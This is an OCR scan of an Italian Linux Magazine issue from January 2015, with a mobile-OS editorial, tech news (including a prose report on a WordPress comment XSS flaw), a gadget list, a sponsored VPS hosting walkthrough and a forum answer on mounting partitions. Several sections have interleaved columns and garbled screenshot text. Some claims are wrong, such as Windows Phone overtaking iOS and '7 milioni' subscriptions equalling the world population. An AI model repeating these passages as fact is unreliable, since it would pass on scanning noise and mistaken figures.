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Mobile: una storia tutta da scrivere 


C'erano una volta i telefoni cellulari, capaci 
al più di effettuare e ricevere qualche 
telefonata o di inviare semplici messaggi 
di testo. Poi, la rivoluzione: la finlandese 
Nokia, già entrata nel cuore di un gran 


con il resto del mondo, ma anche di 
navigare sul Web (sfruttando quello che 
all'epoca era il protocollo WAP) o installare 
semplici applicazioni in grado ad esempio 
di visualizzare sul piccolo display del 
device documenti di testo, fogli di lavoro 
o i più disparati formati file. Ma tutto ciò 
agli utenti evidentemente non bastava e a 
capirlo per primo (0, per lo meno, simulta- 
neamente ad Apple) è Google, stanca di 
investire esclusivamente sul suo motore 
di ricerca e vogliosa di invadere campi 
del tutto inesplorati. E così, con un fare 
così dirompente a tal punto da distogliere 
l'attenzione da Symbian, arriva Android. 
In ogni guerra si contano inevitabilmente 
delle vittime e il primo a pagare l'arti- 
glieria pesante di casa Google è proprio 
Symbian, fatto subito fuori dai giochi 

ma senza che la sua tremenda sconfitta 
determini la fine dei combattimenti. Già, 
perché proprio ora il gioco inizia a farsi 
duro e a combattere contro Google è 
Apple, con uno Steve Jobs estremamente 
convinto che Big G abbia in un qualche 
modo rubato iOS, il sistema operativo 
che batte nel cuore dello smartphone più 
‘amato del mondo: l'iPhone, “Non ti curar 
di loro ma guarda e passa". E in quest'in- 
ferno in salsa mobile, quelli di Google 
sembrano proprio seguire alla lettera 

le parole di Dante. Android va avanti, a 
passo molto più che spedito, supera iOS, 
lo doppia e si fa amare non solo dagli 
utenti, ma anche dai produttori che fanno. 
a botte per realizzare nuovi smartphone e 
tablet equipaggiati con il robottino verde. 
Nel frattempo anche Microsoft, osser- 
vando le statistiche che vedono in picco i 
PC e in crescita esponenziale l'utilizzo di 
dispositivi portatili, decide di investire nel 
mobile, dapprima con Windows Mobile 


(rivelatosi un immenso flop) e successiva- 
mente con Windows Phone. Quella della 
casa di Redmond è una piattaforma che, 
nel suo minimalismo, piace agli utenti, non 
fosse altro perché viaggia accompagnata 
da un'aggressiva strategia di marketing 
da sempre vincente: bassi costi equival- 
gono quasi sempre ad elevate vendite. 
Vendite, queste, talmente alte a tal punto 
che ad oggi Windows Phone è divenuto 
il.secondo sistema operativo mobile più 
utilizzato al mondo. Povero iOS! Dunque, 
c'è un altro vinto (Apple) ed una nuova 
armata pronta a far fuori Android? Beh, 
non è proprio così. Che Windows Phone 
sia capace di mettere | bastoni fra le ruote 
dell'OS di Google sono convinti solo in 
casa Microsoft. Lo scenario che osser- 
viamo, invece, è ben differente. Accanto 
al podio popolato da Android, Windows 
Phone e i0S, stanno spuntando decine di 
altri sistemi minori che hanno tanta voglia 
di visibilità. Firefox OS, Ubuntu Touch, 
Sailfish OS e Tizen (sul quale lavora anche 
la Linux Foundation) sono gli esponenti di 
maggior rilievo. E a chi oggi non si sente in 
dovere di scommettere un solo centesimo 
sulla buona riuscita di questi progetti, 
vogliamo ricordare che anche Android, 
nei suoi primi mesi di vita, era solo un 
granello in un'immensa spiaggia dominata 
da Symbian. E la storia della tecnologia 
ci insegna che le cose possono capovol- 
gersi anche in una sola notte. Basta solo 
avere la volontà di farlo è, ancor di più, 
scovare la giusta via che porta al succes- 
so. Dopotutto, il marketing è pur sempre 
un apostrofo rosa fra le parole “quant'è?”. 
Così, forse, Mozilla, Canonical e Jolla 
dovrebbero prendere spunto dal nemico 
di sempre, Microsoft, e applicare la loro 
stessa strategia di marketing ma forti di 
presentare un prodotto finale qualitativa- 
mente superiore. Che questo accada o 
meno non siamo di certo noi a saperlo. 

E in questa storia, com'è giusto che sia, 
nessuno scriverà mai la la parola “fine”. 


Vincenzo Cosentino 
Invia il tuo commento a: 
redazione@linux-magazine.it 
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MNegli Stati Uniti anche 
gli operatori di droni 
dovranno presto otte- 
nere una patente ad hoc 
e dovranno rassegnarsi 
a utilizzare i propri veli- 
voli sono in determinate 
fasce orarie. A quanto 
pare, infatti, le autorità a 
stelle e strisce dovrebbe- 
ro approvare entro la fine 
dell'anno uno strumento 
normativo per regola 
mentare l’uso dei droni 
sempre piu diffusi a livel 
lo commerciale e sempre 
piu potenti (dunque 


di conseguenza anche 


potenzialmente peri 
colosi). Washington ha 


avuto modo di osservare 
quanto prodotto dalla 
giurisprudenza che si è 
ritrovata già ad affronta 
re i problemi legati alla 
circolazione dei nuovi 
dispositivi nei cieli, non 
ché il dibattito apertosi 
anche in Europa. 

In generale, il rego- 
lamento statunitense 

di prossima adozione 
dovrebbe partire dalla 
volontà di permettere la 
circolazione aerea del 
droni per fini commercia 
li, prevedendo tuttavia 
precise restrizioni orarie, 
e dovrebbe inoltre cl 
sificare i droni in base al 
loro peso, con restrizioni 
crescenti in proporzione 
con le loro dimensioni 
Gli operatori dei droni 
dovrebbero poi ottenere 
una patente specifica, 
avranno la possibilità di 
volare solo al di sotto dei 
400 piedi e nelle sole ore 
diurne 


Internet: un mondo diviso in due 


Più di metà del mondo è ancora off-line, ma il mobile cresce sempre più 


MW L'International Telecomunication Union 
(ITU}; l'agenzia delle Nazioni Unite che si oc- 
cupa di telecomunicazioni, ha presentato il suo 
rapporto annuale sull'ITC dal titoto Measuring 
the Information Society Report. 

Tramite questa analisi UITU ha fotografato 

la situazione 

globale cercando 

di stilare una 

classifica per na- 

zioni ed un indice 

da utilizzare per 

sviluppare politi- 

che ad hoc capaci 

di migliorare la 

situazione e la 

diffusione delle 

connessioni. 

In generale, si legge nel rapporto che 3 miliar- 
di di persone sono al momento on-line e che 
l'utilizzo di Internet continua costantemente a 
crescere: nell'ultimo anno a livello globale ha 
segnato un +6,6%, una media tra la crescita 


sono raddoppiati. Dei 4,3 miliardi di persone 
ancora off-line, il 90% vive comunque in questi 
Paesi ed in particolare in quelli meno svilup- 
pati {2,5 miliardi di persone). 
Per tasso di crescita primeggiano le isole Fiji, 
Capo Verde, la Thailandia, Oman, il Qatar, la 
Bielorussia, la 
Georgia e la Bo- 
snia-Erzegovina. 
Sono le connes- 
sioni mobile ad 
innervare il mon- 
do con maggiore 
rapidità: lo stes- 
so rapporto ITU 
riferisce come 
paradossalmen- 
te- grazie alle 
doppie schede dei Paesi più ricchi - entro il 
2014 si prevede di raggiungere quota 7 milioni 
di abbonamenti mobile attivi, corrispondenti 
quasi all'intera popolazione mondiale: meno 
male che c'è il mobile! 


di 3,3 punti percentuali nei Paesi sviluppati e 
il consistente 8,7% dei Paesi emergenti e in 
via di sviluppo, dove i netizen dal 2009 ad oggi 


Per informazioni: 
http://goo.gl/cHRNLd 


WordPress: attenti a quel commento! 


Un baco nel codice di WordPress mette a rischio un gran numero di siti Web 


MI La società finlandese Klikki 
ha scovato un bug nel codice di 
WordPress 3, versione ampia- 
mente superata dalle release 
più recenti del CMS più popolare, 
ma che continua a mettere a 
rischio un gran numero di siti. 
L'86% di blog, portali e servizi 
basati su WordPress risulta 
potenzialmente affetto dal pro- 
blema, dicono gli esperti. 
L'origine del problema risiede 
nel sistema di commenti di Wor- 
dPress, commenti che potreb- 
bero contenere codice Java- 
Script (JS) malevolo e che nelle 
impostazioni di default del CMS 
vengono pubblicati in automatico 
senza filtri o controlli imposti. 

Il codice JS potrebbe servire a 


compiere ogni genere di azione 
pericolosa per il sito sotto at- 
tacco, inclusa la creazione di un 
nuovo account di amministrazio- 
ne e l'eliminazione delle possi- 
bilità di accesso al backend agli 


WORDPRESS 


admin propriamente detti. A quel 
punto tutto è possibile, inclusa 
l'eliminazione di ogni traccia di 
compromissione, l'aggiunta di 
codice PHP malevolo attraverso 
gli editor interni di WordPress 


{o direttamente da server nel 
caso in cui la compromissione 
riguardasse anche questo) e 
altro ancora. Diversamente dalla 
versione 3, WordPress 4.0 non 

è affetto dal baco. WordPress è 
stata di recente afflitta da altri 
problemi di sicurezza, e non 
stupisce che, a poca distanza 
dalla distribuzione di WordPress 
4.0, Automattic abbia rilascia- 

to una nuova versione (4.0.1) 
contenente patch che mettono 
alla porta bug che possono dare 
origine a attacchi XSS (Cross- 
Site Scripting), basati su codice 
HTML malformato. 


Per informazioni 


http://g00.gl/wa078h 


“Perché Google non rimuove quel link?” 


Mountain View si mostra restia ad agire alle segnalazioni di violazione del copyright 


MI Google, nel tentativo di 
accondiscendere alla richieste 
dell'industria dei contenuti 
senza abdicare alla propria 
missione di organizzare il 
sapere diffuso in Rete, sceglie 
di non piegarsi alle richieste 

di rimozione per violazione del 
copyright che non siano circo- 
stanziate. A mostrarlo con chia- 
rezza sono le informazioni che 
Mountain View rende disponibili 
nel nome della trasparenza: se 
certa parte dell'industria dei 
contenuti invita Google a rimuo- 
vere dai risultati di ricerca le 
home page dei siti che indirizza- 
no a contenuti caricati in Rete in 
violazione del copyright, Google 
sembra prendere in conside- 
razione sono i link alle pagine 


E-book: per un pugno di IVA 


dedicate al singolo contenuto, 

lasciando che le home page dei 
siti siano rintracciabili dai citta- 
dini della Rete. Fra siti dedicati 
ai torrent e altri allo streaming 


di contenuti caricati senza 
l'autorizzazione dei detentori dei 
diritti, MPAA segnala 81 URL, 
relativi a 76 domini. Si tratta per 
la maggior parte di home page, 
o di pagine interne che accol- 
gono l'utente in una sezione del 


sito. Google, però, ne ha negato 
la rimozione delle home dai 
risultati di ricerca. In passato 
la casa di Mountain View si è 
mostrata restia nell'agire sulle 
home page con dei mecca- 
nismi di rimozione basati sul 
DMCA: non può evidentemente 
sostituirsi all'autorità giudizia- 
ria nell'analizzare la natura di 
un sito, ma si limita a verificare 
la legittimità della richiesta di 
rimozione controllando che il 
singolo URL ospiti il contenuto 
segnalato in violazione del 
diritto d'autore. Forse sarebbe 
meglio trovare una soluzione 
più automatizzata. 


Per informazioni: 
http://g00.gl/27vRpk 


In Italia l'aliquota passa al 4%. Ma l'Europa non ci sta e minaccia multe 


MI Al grido di #unlibroèunlibro, il ministro per 
i Beni e leattività culturali e il Turismo Dario 
Franceschini ha annunciato l'approvazione da 
parte della Commissione bilancio dell'emenda- 
mento per portare l'IVA sugli eBook al 4%. 


La modifica alla Legge di 
Stabilità fortemente voluta da 
Palazzo Chigi prevede anche la 
copertura del mancato gettito 
generato, calcolato in 7,2 milioni 
di euro l'anno: saranno recupe- 
rati dal fondo per gli interventi 
strutturali di poltica economica. 
Nonostante la soddisfazione 
espressa dall'Associazione 
Italiana Editori, la mossa det 


Governo italiano, in realtà, potrebbe essere 
solo simbolica:se non addirittura dannosa: 

se non cambia l'impostazione europea l'Italia 
rischierà una procedura per infrazione ed una 


multa da parte di Bruxelles. La UE, infatti, gia 
nel 2012 è intervenuta sulla tassazione dei libri 
digitali multando Francia e Lussemburgo che 


l'avevano abbassata rispettivamente al 7 e al 
3% ed'obbligandole a riallinearla a quella degli 
altri Paesi (15%) e per il momento sembra aver 
bocciato tutti itentativi di mediazione in materia 
portati avanti da Italia e Francia. Per Bruxelles 


ilproblema rimane ideologico: 
gliebook sono equiparati ai beni 
e servizi digitali e per questo 
hanno una tassazione superiore 
(atmomento in Italia 22%) ed 
una tassazione differente costi- 
tuirebbe dunque un aiuto statale 
illecito al settore. 

Ulteriore problema è poi quello 
della:transnazionalità dei negozi 
digitali che:li vendono: Amazon 


ha sede in Lussemburgo, Apple e Kobo ancora 
altrove, e mentre'ora l'IVA è calcolata in base 
alla nazione dove il libro viene venduto, dal 2015 
sarà calcolata in:base al Paese dell'acquirente. 


Per informazioni: 


ttp://goo.gl/1Zî2SM 


Flash 


Fuori Google, 
dentro Yahoo 


MI Mozilla ha annunciato 
di aver sottoscritto un 
contratto con Yahoo che 
renderà per cinque anni 
il sito in viola il motore di 
ricerca di default del suo 
browser Firefox. Almeno 
negli USA. Il nuovo ac- 
cordo cambia la situa- 
zione precedente che 
vigeva dal 2004 e che 
vedeva Mozilla Founda- 
tion riconoscere un 
ruolo primario al motore 
di ricerca di Big G. Per 
Mozilla non si è trattata 
di una scelta determina- 
ta dai costi, ma piuttosto 
dalla strategia generale: 
il GEO di Mozilla, Chris 
Beard, ha riferito che 
Yahoo, Baidu e Yandex 
rappresentano partner 
maggiormente allineati 
con gli obiettivi di Fire- 
fox. Accanto a questa 
decisione di partenza, 
Mozilla ha spiegato di 
aver predisposto uno 
strumento veloce per 
scegliere il proprio mo- 
tore di ricerca preferito: 
un menu a tendina offre 
i diversi siti per effet- 
tuare le ricerche tra cui 
Yahoo, Google, Bing, 
DuckDuckGo, Amazon e 
Wikipedia. Ogni utente è 
quindi comunque libero 
di affidarsi al motore di 
ricerca che più preferi- 
sce. Ad accompagnare 
le modifiche per quanto 
riguarda la configurazio- 
ne di default, poi, vi è la 
prossima introduzione 
di uno strumento Do Not 
Track (DNT) che permet- 
te una navigazione priva 
di tracce. 


Geriniai0 2015 e 7 


Flash 


Samsung e il 
mouse intelligente 
M Samsung ha presenta- 
to EYECAN+, la seconda 
generazione del suo 
mouse a controllo visivo 
che si pone come obiet 
tivo quello di aiutare gli 
utenti con disabilità 
Quello dell’accessibilità 
è infatti un tema sempre 
molto caldo e gli sviluppi 
nel settore, fortunata 
mente, non sembrano 
mancare. Una versione 
del progetto era già stata 
mostrata nel 2012: si 
tratta di un mouse che 
permette di navigare on- 
line, ma anche comporre 
e modificare documenti 
digitali attraverso un si- 
stema di input basato sul 
movimento degli occhi 
dell'utente. Il dispositivo 
non necessita dell'ado 
zione di speciali occhiali, 
ma tra 
dell'utente, decodifican- 
dolo e permettendo in 
questo modo di muovere 
il cursore tramite di esso. 
Per il momento, in real 
tà, EYECAN+ non è in 
commercio, ma e stato 
prodotto da Samsung 
per essere distribuito 


zia lo sguardo 


gratuitamente ad alcune 
organizzazioni no-profit. 
Il software sarà rilascia- 
to sotto licenza Open 
Source e ciò non può che 
farci piacere anche per- 
ché così facendo gli svi- 
luppi futuri di certo non 
mancheranno. Speriamo 
solo che questo disposi- 
tivo potra presto correre 
in aiuto di quegli utenti 
che ne hanno bisogno e 
che gli sviluppatori pren- 
dano a cuore il progetto. 


: cifratura da inizio a fine! 


Con TextSecure gli utenti Android possono stare tranquilli. E quelli di i0S? 


MI WhatsApp ha reso disponibile una nuova 
versione della popolare app di messaggistica 
su terminali Android, e la novità principale del- 
la release consiste nell'inctusione delle tecno- 
logia crittografica TextSecure per messaggi 
sicuri al riparo da intercetta- 

zioni. Le chat e i messaggi di 

WhatsApp risultano ora cifrati 

“end-to-end”, sono cioè leg- 

gibili solo dai partecipanti alla 

conversazione e non possono 

essere decriptati nemmeno 

dallo stesso team di sviluppa 

tori della app. 

La disponibilità di canali di 

comunicazioni protetti end-to- 

end {su mobile o su PC] non è 

certo una novità, nondimeno la base di utenza 
di WhatsApp (600 milioni di “messaggiatori” 
in tutto il mondo) fornisce un certo peso alla 
novità. Per ora comunque il cambiamento 
riguarda solo Android, e non c'è una data 
precisa di rilascio della stessa funzione su j0S: 


evidentemente sussistono delle differenze tra 
le due piattaforme, tali da spingere l'azienda 
acquisita da Facebook a procedere a passi 
successivi. Dettaglio curioso: il lavoro per im- 
plementare TextSecure in WhatsApp è iniziato 
proprio a ridosso dell'opera- 
zione che ha portato il social 
network di Mark Zuckerberg 
a pagare più di 21 miliardi di 
dollari per il servizio di mes- 
saggistica. 
It lavoro, comunque, non è 
finito: i0S a parte, WhatsApp 
introdurrà prossimamente 
anche un meccanismo di 
verifica delle chiavi crittografi- 
che tra i client, in modo tale da 
arginare qualsiasi tentativo di attacco man-in- 
the-middle che potrebbe consentire l'intercet- 
tazione dei messaggi scambiati. 


Per informazioni: 
http://goo.gl/s9fkJo 


Microsoft e la rivoluzione Open Source 


| gioielli della corona .NET e Visual Studio offerti alla community 


WI Big M fa un passo enorme 
per la sua storia e decide di 
puntare seriamente su un 
approccio Open Source. La stra- 
tegia sembra davvero convinta 
e sincera, tanto da attirare il 
plauso della Linux Founda- 
tion per lo sforzo. È senza 
dubbio una mossa ben pon- 
derata, ma guai a pensare si 
tratti di una mossa disperata: 
quel che serve a Microsoft è 
aggiungere nuovi ecosistemi 

a quelli che già controlla 
saldamente da tempo, e 

le scelte fatte potrebbero 
essere davvero quelle giuste. 
L'assunto base da cui partire è 
il riconoscimento di un mer- 
cato profondamente cambiato 
dal 2000, anno in cui Microsoft 
controllava solidamente il 98% 
degli schermi in circolazione 


sulle scrivanie di tutto il mondo: 
l'esplosione del mercato mobile 
{che Microsoft non è riusci- 

ta a cavalcare nonostante la 
presenza in casa di un prodotto 
come Windows Mobile e la sua 


reincarnazione Windows Pho- 
ne), la diffusione di terminali 
dotati di sistemi operativi altrui 
e la crescita di offerta di servizi 
offerti attraverso il browser, 
sono tutti fattori che incidono 
sulla rilevanza delle tecnologie 


Microsoft e la loro centralità 

nel panorama |CT. Le principali 
novità di Connect() sono tre: il 
rilascio con licenza Open Source 
dei componenti core di .NET e la 
sua conseguente apertura allo 
sviluppo interpiattaforma, 
l'anteprima di Visual Studio 
2015 e della piattaforma dot. 
NET 2015 (compreso ASP. 
NET 5.0), il rilascio di una 
nuova versione gratuita di 
Visual Studio denominata 
Community e pensata per al- 
largare a studenti, piccoli svi- 
luppatori, non profit e molti 
altri settori il bacino potenziale 
di professionisti che investono 
e creano prodotti basati sulle 
tecnologie Microsoft. 


Microsoft’ 


Per informazioni: 


http://goo.gl/to8vLw 


Linux gadget e prodotti 


Periferiche, accessori e altri dispositivi per lavorare e divertirsi nel tempo libero 


COVER 

O PASSATEMPO? 

Se per Natale vogliamo regalare a 
un amico un gadget utile ma nello 
stesso tempo originale, possia- 
mo optare per questa simpatica 
custodia per iPhone. All’apparenza 
sembra una normale cover da 
utilizzare per proteggere il device 
da urti e cadute, ma nella parte 
posteriore è un vero e proprio 
labirinto nel quale far viaggiare la 
pallina metallica. Le tre versioni 
disponibili si differenziano 
per la colorazione e per 
il disegno. Non ci resta 
quindi che scegliere 
quella che preferiamo! 
Per informazioni: 
www.amazon.com 


‘LA MUSICA CHE... RISCALDA! | 


Le nuove cuffie della SBS sono l’ideale per le giorna- 
te invernali. Belle, pratiche e funzionali, permettono 

di ascoltare musica ad altissima qualità e di parlare al 
cellulare grazie al tasto risposta e al microfono di cui 
sono dotate. Disponibili solo nella colorazione grigia e 
imbottite internamente di lana, sono il regalo di Natale 
ideale per l’amico particolarmente freddoloso. Il prezzo 
contenuto ne invoglia l'acquisto. 

Per informazioni: 

www.sbsmobile.it 
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LA FELPA MUSICALE 


Ecco la felpa ideale per chi ama ascoltare musica in 
qualsiasi momento della giorna- 
ta, sia a casa che per strada. 
A parte essere morbida e 
calda, è dotata all’interno 
del cappuccio di microfoni 
integrati. Nell’ampia tasca 
frontale, invece, vi è lo 
spazio per custodi- 
re lo smartphone 

o il lettore MP3 

da connettere via 
jack universale. 
Disponibile in 3 
colorazioni e in 4 
misure differenti, 
può essere lavata in 
lavatrice rimuovendo le 
componenti elettriche. 
Per informazioni: 
www.hi-fun.com 


SSNRSINBISSSIETEZESSIIITERIEETESA 


IL BRACCIALE USB 


Questi colorati connettori permettono di collegare il proprio 
smartphone o tablet ad altri dispositivi USB per trasferire con- 
tenuti quali dati o file multimediali. La forma piatta assicura 
una maggiore ergonomia ed evita che con il frequente utilizzo 
il cavo si rovini e si attorcigli. Il magnete di cui sono composti, 
inoltre, fa sì che possano chiudersi in sé stessi trasformandosi 
in simpatici braccialetti. 

Per informazioni: www. triohg.com 


-JESIIINEDIIPASICRAPEREVI PREFERITE TILTTO) 


DOMOTICA NATALIZIA 


i 
. Chi per questo Natale ha deciso di non badare a spese e 
di regalarsi qualcosa di davvero originale, può prendere 


LA LUCE E LA MUSICA CHE VUOI TU! 


Si tratta di una lampadina LED, a basso consumo energetico 
e dotata di speaker Bluetooth 3.0 che consente di ascoltare 
musica da smartphone, PC, notebook o tablet. Per metterla in 
funzione basterà avvitarla ad una lampada o al lampadario di 
casa. La luce che emana è sufficiente rende 
l’ambiente intimo e comun- 
que illuminato anche se 
non a giorno. Grazie al 
telecomando in dotazio- 
ne è possibile regolare la 
luminosità e il volume della 
musica. 


in considerazione il nuovissimo albero Wi-Fi. Alto 2,3 me- 
tri e composto da 900 lampadine LED e altoparlanti per 
fi diffondere la propria musica preferita, è gestibile tramite 
dispositivi iI0S e Android. Basta installare un'apposita 
ll appe,anchea distanza, sarà possibile accenderlo e 
spegnerlo, cambiare il programma di illuminazione, sce- 
. glierela 
musica di sotto- 
fondo. Davvero 
Ù originale come 
Y idea, peccato 
| solo per il prezzo 
‘ cheè decisa- 


Per informazioni: 
www.flexyoffice.it 


 mentealto. 

‘ Perinformazioni: 
www.hamma- ATI ciao 
cher.com 


SSR 


PER | PIÙ PICCOLI? UN BEL PC! 


Caesar 
Pdl I KANO COMPUTER KIT | 

i Se il regalo di Natale per i nostri figli o nipoti deve 

. essere utile oltre che naturalmente gradito, perché non 


scegliere questo nuovissimo PC creato apposta peri 


CARICABATTERIE LUMINOSO 


più piccoli? Tra le componenti più importanti segna- 

Se per Natale vogliamo regalare qualcosa di utile, originale e a liamo 512 MB di memoria RAM, speaker e tastiera con 
tema con il periodo, possiamo optare per questo nuovo caricatore. touchpad integrato, uscite HDMI e USB, chiavetta Wi-Fi 
Permette di ricaricare l'iPhone grazie alla porta USB e la sua parti- e tanto altro ancora. Un'idea originale e colorata per 


colarità sta semplicemente nella...lucentezza! Una volta collegato 
alla fonte di energia, infatti, le 10 luci che compongono il cavetto si 
illumineranno proprio come le luci che addobbano l'albero di Natale. 
Il cavo lungo 117 cm, potrebbe decorare il monitor del PC o una 
parte della scrivania, rendendo l'ambiente festoso! 


introdurre i ragazzi al mondo informatico! 
Per informazioni: www.kano.me/kit 


i 


Per informazioni: www.thinkgeek.com 
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AD OGNUNO IL SUO 
GLOUD SERVER! 


Sei alla ricerca di un VPS? Con HostingSolutions.it hai decine di immagini 
GNU/Linux già pronte all’uso. E tu, di che distro sei? 


vere un sito Web personale, un blog dove convididere 

con il mondo intero tutto ciò che ci passa dalla mente 

o un sito di e-commerce è ormai divenuto un must 

per molti di noi. Soluzioni economiche o addirittura 
gratuite vanno bene solo per i primi periodi, ma quando le visite 
incominciano a salire, è assolutamente impensabile continuare ad 
affidarsi ad un hosting condiviso e dalla dubbia qualità. Pensiamo 
ad esempio all’idea di installare un certificato di sicurezza sul 
nostro sito Web (HTTPS): con gli hosting condivisi non abbiamo 
la possibilità di farlo proprio perché l'indirizzo IP del nostro sito 
è in realtà condiviso con altre decine (in alcuni casi anche centi- 
naia) di altri siti Web non di nostra proprietà, Ma questo è solo 
uno dei tanti motivi che dovrebbero spingerci a migrare verso un 
server dedicato. Ma, il quesito che balza subito nella mente di chi 
si trova di fronte ad un bivio del genere è: “quanto mi costa una 
soluzione del genere?”. Tutto dipende dalle nostre reali necessità. 
Fortunatamente, però, le tecnologie cloud computing ci permet- 
tono di ottenere la massima resa con la minima spesa. Sono in- 
fatti ormai lontani i tempi in cui era necessario spendere migliaia 
di euro annualmente per fittare il proprio server dedicato. Oggi. 
sul Web tutto si muove attraverso i cosiddetti VPS, acronomo di 
Virtual Private Server. Di cosa si tratta? In poche parole sono 
macchine virtuali (con risorse hardware virtuali sì, ma dedicate) 
avviate su un singolo server di proprietà del nostro hoster. Il vero 
vantaggio sta proprio nei costi, calcolati su base oraria di utilizzo. 
Ciò vuol dire che basterebbe spegnere il nostro server per azze- 
rarne i costi di gestione. E fra le aziende che offrono soluzioni 
a buon mercato e al tempo stesso altamente prestanti c'è anche 
HostingSolutions.it. 


TRASPARENZA E FACILITÀ D’USO 


A differenza di molti altri concorrenti, HostingSolutions.it offre 
ai suoi clienti massima trasparenza indicando senza alcun proble- 
ma dove sono effettivamente collocati i VPS acquistati. Tutto si 
svolge nel data center di Firenze equipaggiato con hardware Dell 
ce SAN NetApp. La connettività di rete è garantita da connessioni 
in fibra ottica con 4 differenti operatori nazionali: così facendo, 
anche in caso di problematiche con un singolo operatore, il nostro 
VPS continuare a rispondere correttamente, proprio perché si ap- 
poggerà alle restanti 3 connessioni disponibili. Ma, come connet- 
tersi alla propria istanza cloud? Abbiamo l'imbarazzo della scelta. 


so000 
0eo0òd 


so 
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Possiamo infatti affidarci alla console VNC presente nel pannello 
di controllo di HostingSolutions.it o ad un client di desktop re- 
moto (ad esempio Remmina). Ma la soluzione più comoda per 
noi amanti del Pinguino è SSH: ci basta accedere al terminale per 
attivare in pochi secondi una shell remota sul nostro cloud server. 


LA DISTRO CHE VUOI TU! 


Ogni istanza cloud server può essere personalizzata secondo i pro- 
pri gusti. C'è chi preferisce un VPS equipaggiato con le più recen- 
ti release di Windows Server e chi, come noi, preferisce affidarsi 
ad una qualsiasi distro GNU/Linux. In questo, HostingSolutions. 
it si distingue ancora una volta da tutti i suoi concorrenti, offrendo 
ai clienti la possibilità di scegliere fra decine di configurazioni 
differenti. Le distro disponibili spaziano da Ubuntu Server (nelle 
sue release 12.04 LTS o 14.04 LTS) a Fedora 20, fino ad arrivare 
alla stabilissima CentOS 6.5 Server. Ognuna di queste distro può 
essere installata nell’istanza cloud server con particolari configu- 
razioni già pronte all'uso. Ad esempio, se abbiamo intenzione di 
metter su un nuovo sito Web, scegliendo Ubuntu Server abbiamo 
la possibilità di trovare LAMP già pre-installato, E a proposito di 
siti Web, possiamo far sì che anche Wordpress, Joomla o Pre- 
staShop siano già attivi al momento del primo avvio, 


Scegli una immagine 


Nome Lanmagine Toe Azioni 


L007 + Debian © aendG4 mago 
008 - Ubuntu Server DI.1 LIS Portgre SOL 9.2 mage 
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I Fig. 1 + Al momento della creazione di una nuova istanza, sce- 


gliamo l'immagine della distro che vogliamo utilizzare 


Il VPS che vuoi tu 


Ecco come acquistare una nuova soluzione cloud server su HostingSolutions.it: bastano 


davvero pochi clic e sei subito operativo! 


e + wwnwihostingiolutione lt 


a iosting 


Asunto | GUbd i Luni | Airieomga | Boara enna | Besana i dune 
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CREA IL TUO SITO! 


TTUTTO IL GUSTO DI FARLO (N CASA PIOVa SUDITO 


LA GIUSTA META 
01 Dal nostro PC avviamo il browser che preferiamo [ad 
esempio Google Chrome] e da qui raggiungiamo la pa- 
gina Web www.hostingsolutions.it. Dal menu principale del sito, 
spostiamoci in Cloud per visualizzare tutte le soluzione di Cloud 
Computing Pubblico disponibili. 


IL CONFIGURATORE 
0 Dal menu Cloud clicchiamo su Configura il tuo cloud: 
da questa pagina possiamo simulare la nostra istanza, 
scegliendo fra le soluzioni Silver, Gold o Platinum. Selezioniamo Li- 
nux e indichiamo la distro da utilizzare (ad esempio Ubuntu Server 
14.04 LTS LAMP). 


ServerMate... 


Apart Gi saatizazrimone | Oemat Coma 
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PASSIAMO ALL’ACQUISTO! 
0 Se vogliamo procedere all'acquisto del nostro 
nuovo cloud server, clicchiamo sul pulsante At- 
tiva il servizio. Appare quindi una nuova pagina. Se è la 
prima volta che acquistiamo su HostingSolutions.it, clic- 
chiamo sulla voce Nuovo cliente. 


ù i Wwaw.hostingsolutions.It/cioud/ sistemi-oper atividoud.asp 

MRI ue È = dida bid ce x n i 
Wines Gi Hosting Sohafore marsiene cosuenmente Sg Polanco cei siziatnò 
comunemente defini 
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operativi e software 


QUALE DISTRO SCEGLIERE? 
02 Clicchiamo ad esempio su Sistemi operativi e sof- 
tware per visualizzare l'elenco di tutti gli OS in- 
stallabili sulle istanze cloud server acquistate. Tralasciando 
Windows, le principali distro installabili sono Ubuntu Server, 
Fedora, Debian o CentOS. 


sf pisncheta bugitt puta sRuezza Pers i || H 
anta portino dalia dato cb rada (Apri 1 i (08 
2014; pl 


QUANTO SPAZIO VUOI? 
0 Un cloud server Silver ci offre 1 CPU, 2 GB di me- 
moria RAM e un HD di 10 GB. Se abbiamo bisogno 
di più spazio su disco, muoviamo lo slider GB aggiuntivi. 
In basso appare l'importo per ogni ora di utilizzo (ed un 
totale mensile). 


Carica saldo prepagato 


DRITTI AL PAGAMENTO 

A questo punto non ci resta che compilare tutti i campi 

presenti con i nostri dati (Nome, Cognome, numero di 
telefono, codice fiscale). Fatto ciò, scegliamo l'importo della ricari- 
ca da effettuare (Carica saldo prepagato). Clicchiamo su Continua e 
seguiamo la procedura guidata. 


Gennaio 2015 2213 


DAL FORUM 


WWW.LINUX-MAGAZINE.IT 


SOLUZIONI DAL FORUM 


Ogni mese i thread più interessanti estratti dal forum di Linux Magazine. 
Se non fai ancora parte della nostra squadra, iscriviti subito! Il nostro sito 
è pronto a ospitare esperti, neofiti o semplicemente chi ne vuole sapere 
di più a proposito di GNU/Linux e di Software Libero 


Sistema/Hardware 


NUOVE PARTIZIONI, MONTAGGIO PERMANENTE 


DOMANDA »Salve a tutti, espongo subito il mio problema: ho cancellato 
una partizione e, al suo posto, ho creato 3 partizioni più piccole che GPar- 
ted (http://gparted.sourceforge.net/) vede perfettamente. I sistemi operati- 
vi installati dopo questa operazione non hanno problemi mentre i sistemi 
operativi installati prima di questa operazione non vedono le partizioni. 
Come posso risolvere il problema? 


Zia prrsdo craned 75% 
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MW Fig 1 Gpartedì, il front-end grafico al progetto GNU Parted 


SOLUZIONE e La domanda è stata posta qualche tempo fa dall'utente Sar- 
gonb e l'intervento dei due utenti robs e Argos permette di arrivare alla solu- 
zione: c'è stato uno scambio di informazioni dettagliate che ha visto al centro 
dell'attenzione il file fstab in /ete. Le partizioni sono viste dal comando fdisk -1 
suggerito dall'utente robs, ma l'autore della richiesta lamenta il mancato acces- 
so a queste partizioni. Viene allora indicato di provare un mounting manuale: 


mkdir /media/nomecartella 


mount -t fs /dev/sd* -o rw /media/nomecartella 


dove al posto di fs occorre inserire il tipo di file system associato alla partizione 
(ext2, ext3, ext4. vfat etc) e sostituendo rw con ro per un mounting in sola 
lettura. Se la partizione è formattata in NTFS ci si assicuri che sia installato il 
pacchetto ntfs-3g (Www.tuxera.com) e nella riga di fstab riportare ntfs-3g in 
luogo di fs. Di seguito alcuni esempi elencati dall'utente Argos: 


- in caso di ext3: mount -t exî3 /dev/sd* -0 rw /media/nomecartella 
